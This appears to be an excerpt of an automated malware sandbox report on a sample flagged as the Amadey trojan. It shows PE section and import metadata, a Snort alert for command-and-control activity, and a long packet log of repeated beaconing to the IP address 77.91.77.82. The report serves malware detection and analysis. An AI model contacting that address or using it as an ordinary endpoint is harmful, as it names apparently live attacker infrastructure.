                      vmjyxrbh0x3150000x19f0000x19e2001de2c7ec5459c4ea7846a624c7cb44caFalse0.9947631725399939data7.955242313605146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      bxjwqywv0x4b40000x10000x400f47a0d964bb474871c64af70a9b1b1d6False0.841796875data6.491781295527501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x4b50000x30000x22009b6c3d3f6e9554f224957699d42f7b49False0.09719669117647059DOS executable (COM)1.06791147204385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x4b2f840x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      06/28/24-21:16:04.206734TCP2856147ETPRO TROJAN Amadey CnC Activity M34973180192.168.2.477.91.77.82

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jun 28, 2024 21:16:04.201678038 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:04.206501007 CEST804973177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:04.206577063 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:04.206733942 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:04.211510897 CEST804973177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:04.937787056 CEST804973177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:04.937849045 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:04.948643923 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:04.954322100 CEST804973177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:05.178328037 CEST804973177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:05.178386927 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.281673908 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.281958103 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.286817074 CEST804973277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:05.286925077 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.287019014 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.287193060 CEST804973177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:05.287250042 CEST4973180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.291851997 CEST804973277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:05.993367910 CEST804973277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:05.993475914 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.994713068 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:05.999528885 CEST804973277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:06.217600107 CEST804973277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:06.217744112 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:06.328537941 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:06.328852892 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:06.333707094 CEST804973377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:06.333782911 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:06.333981037 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:06.334141970 CEST804973277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:06.334199905 CEST4973280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:06.339098930 CEST804973377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:07.044295073 CEST804973377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:07.044394970 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.045072079 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.050338030 CEST804973377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:07.273659945 CEST804973377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:07.273761034 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.375423908 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.375701904 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.380544901 CEST804973477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:07.380626917 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.380830050 CEST804973377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:07.380860090 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.380894899 CEST4973380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:07.386428118 CEST804973477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:08.100631952 CEST804973477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:08.100713015 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.101411104 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.106364965 CEST804973477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:08.360853910 CEST804973477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:08.360950947 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.469250917 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.469867945 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.474644899 CEST804973477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:08.474687099 CEST804973577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:08.474718094 CEST4973480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.474777937 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.474921942 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:08.479763031 CEST804973577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:09.183913946 CEST804973577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:09.183993101 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.184880972 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.189659119 CEST804973577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:09.405306101 CEST804973577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:09.405378103 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.516047001 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.516550064 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.521321058 CEST804973677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:09.521425009 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.521517038 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.521532059 CEST804973577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:09.521591902 CEST4973580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:09.526324034 CEST804973677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:10.219419003 CEST804973677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:10.219490051 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.220267057 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.225203991 CEST804973677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:10.438333988 CEST804973677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:10.438431978 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.547691107 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.548115015 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.553085089 CEST804973777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:10.553194046 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.553375006 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.553545952 CEST804973677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:10.553602934 CEST4973680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:10.558197975 CEST804973777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:11.290937901 CEST804973777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:11.291023970 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.292999983 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.301652908 CEST804973777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:11.523827076 CEST804973777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:11.523947001 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.641674042 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.642019987 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.646915913 CEST804973877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:11.646992922 CEST804973777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:11.647022963 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.647062063 CEST4973780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.647521019 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:11.652417898 CEST804973877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:12.345360041 CEST804973877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:12.345484972 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.346448898 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.352433920 CEST804973877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:12.563783884 CEST804973877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:12.563901901 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.674885035 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.675259113 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.680640936 CEST804973877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:12.680689096 CEST804973977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:12.680723906 CEST4973880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.680783033 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.680932999 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:12.686743975 CEST804973977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:13.378767014 CEST804973977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:13.378886938 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.379724026 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.384541988 CEST804973977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:13.597537041 CEST804973977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:13.597697973 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.719577074 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.719990015 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.725054026 CEST804974077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:13.725080013 CEST804973977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:13.725174904 CEST4973980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.725198984 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.725559950 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:13.730293989 CEST804974077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:14.414599895 CEST804974077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:14.414670944 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.415323019 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.422089100 CEST804974077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:14.633209944 CEST804974077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:14.633280993 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.734750986 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.735177040 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.739854097 CEST804974077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:14.739916086 CEST804974177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:14.739962101 CEST4974080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.740009069 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.740161896 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:14.744893074 CEST804974177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:15.458205938 CEST804974177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:15.458281994 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.459114075 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.463918924 CEST804974177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:15.681932926 CEST804974177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:15.681988955 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.797333956 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.797665119 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.802570105 CEST804974177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:15.802640915 CEST4974180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.802658081 CEST804974277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:15.802722931 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.802874088 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:15.807640076 CEST804974277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:16.495454073 CEST804974277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:16.495773077 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.496362925 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.501692057 CEST804974277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:16.713490963 CEST804974277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:16.715652943 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.844194889 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.844474077 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.849283934 CEST804974477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:16.849351883 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.849536896 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.849576950 CEST804974277.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:16.849626064 CEST4974280192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:16.854501963 CEST804974477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:17.564331055 CEST804974477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:17.564500093 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.565274000 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.570136070 CEST804974477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:17.786777020 CEST804974477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:17.786994934 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.890930891 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.891261101 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.896111012 CEST804974677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:17.896193027 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.896231890 CEST804974477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:17.896287918 CEST4974480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.896378994 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:17.901242971 CEST804974677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:18.636194944 CEST804974677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:18.636291981 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.636989117 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.641791105 CEST804974677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:18.868288040 CEST804974677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:18.868345976 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.984863043 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.985459089 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.990334988 CEST804974677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:18.990370035 CEST804974977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:18.990395069 CEST4974680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.990448952 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.990667105 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:18.995418072 CEST804974977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:19.705590963 CEST804974977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:19.705920935 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:19.706707954 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:19.711518049 CEST804974977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:19.932682991 CEST804974977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:19.932769060 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.047255039 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.047691107 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.053606987 CEST804975177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:20.053688049 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.053862095 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.055073977 CEST804974977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:20.055147886 CEST4974980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.058665991 CEST804975177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:20.771271944 CEST804975177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:20.771755934 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.773139000 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:20.778022051 CEST804975177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:21.001621008 CEST804975177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:21.002249002 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.112998962 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.113601923 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.118346930 CEST804975177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:21.118417025 CEST4975180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.118769884 CEST804975377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:21.118906975 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.119020939 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.123836994 CEST804975377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:21.839097977 CEST804975377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:21.839251995 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.840107918 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:21.846638918 CEST804975377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:22.066912889 CEST804975377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:22.066994905 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.174572945 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.175513983 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.180269003 CEST804975377.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:22.180370092 CEST4975380192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.180525064 CEST804975477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:22.180658102 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.189647913 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.194552898 CEST804975477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:22.891537905 CEST804975477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:22.891657114 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.892379045 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:22.897455931 CEST804975477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:23.115746975 CEST804975477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:23.119731903 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.235008955 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.235444069 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.240608931 CEST804975577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:23.240720034 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.240952969 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.241660118 CEST804975477.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:23.241725922 CEST4975480192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.246551991 CEST804975577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:23.954905987 CEST804975577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:23.955003023 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.955631971 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:23.961854935 CEST804975577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:24.197046041 CEST804975577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:24.197137117 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:24.312786102 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:24.313097000 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:24.318391085 CEST804975677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:24.318484068 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:24.318589926 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:24.319098949 CEST804975577.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:24.319154978 CEST4975580192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:24.323422909 CEST804975677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:25.042634010 CEST804975677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:25.042787075 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.043482065 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.048321009 CEST804975677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:25.262051105 CEST804975677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:25.262166977 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.375418901 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.375792027 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.380806923 CEST804975777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:25.380918980 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.381006956 CEST804975677.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:25.381062984 CEST4975680192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.381141901 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:25.385904074 CEST804975777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:26.088069916 CEST804975777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:26.088219881 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.088958979 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.094400883 CEST804975777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:26.309264898 CEST804975777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:26.309366941 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.422467947 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.422842026 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.427882910 CEST804975877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:26.428000927 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.428246975 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.428287983 CEST804975777.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:26.428349018 CEST4975780192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:26.433012009 CEST804975877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:27.119123936 CEST804975877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:27.119216919 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.119851112 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.124629974 CEST804975877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:27.336050034 CEST804975877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:27.336112022 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.438039064 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.438419104 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.443454027 CEST804975877.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:27.443546057 CEST4975880192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.444359064 CEST804975977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:27.444490910 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.444746017 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:27.449559927 CEST804975977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:28.142973900 CEST804975977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:28.143054962 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.144495964 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.149280071 CEST804975977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:28.396919012 CEST804975977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:28.397078991 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.500308037 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.500642061 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.505527973 CEST804976077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:28.505641937 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.505748987 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.505845070 CEST804975977.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:28.505893946 CEST4975980192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:28.510664940 CEST804976077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:29.231925964 CEST804976077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:29.232045889 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:29.232848883 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:29.237875938 CEST804976077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:29.457209110 CEST804976077.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:29.457431078 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:29.596256018 CEST4976080192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:29.596539974 CEST4976180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:29.601460934 CEST804976177.91.77.82192.168.2.4
                      Jun 28, 2024 21:16:29.601576090 CEST4976180192.168.2.477.91.77.82
                      Jun 28, 2024 21:16:29.601763964 CEST4976180192.168.2.477.91.77.82
